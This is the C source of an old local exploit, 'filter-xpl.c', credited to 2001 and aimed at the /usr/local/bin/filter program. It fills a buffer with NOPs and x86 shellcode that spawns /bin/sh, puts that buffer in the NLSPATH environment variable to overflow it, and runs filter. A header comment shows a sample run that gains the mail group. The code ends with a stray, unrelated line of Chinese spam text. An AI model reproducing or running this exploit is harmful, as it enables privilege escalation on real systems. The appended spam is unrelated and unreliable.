/* filter-xpl.c * by core 2001 * * $ ./filter-xpl * filter exploit by core 2001 based on code by Solar Designer/_Phantom_ 1997 * bash$ id * uid=23269(core) gid=100(users) egid=12(mail) * bash$ * * Reference: * http://www.tao.ca/fire/bos/0354.html * * looks like the code was ripped by phantom from Solar Designer * who published it in feb 1997. * * Date: Wed, 30 Apr 1997 13:46:39 +0200 (GMT+0200) * From: _Phantom_ * To: Fyodor * Subject: Re: New sudo exploit * * Here 'tiz, the abominable SUDO exploit... * EDUCATIONAL purposes only.... :-) * * See ya. * Bye! */ #include #include #include #include #include #define PATH_FILTER "/usr/local/bin/filter" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; printf("filter exploit by core 2001 based on code by Solar Designer/_Phantom_ 1997\n"); setenv("NLSPATH",buff,1); execl(PATH_FILTER, "filter","bash", NULL); }

亚洲欧美在线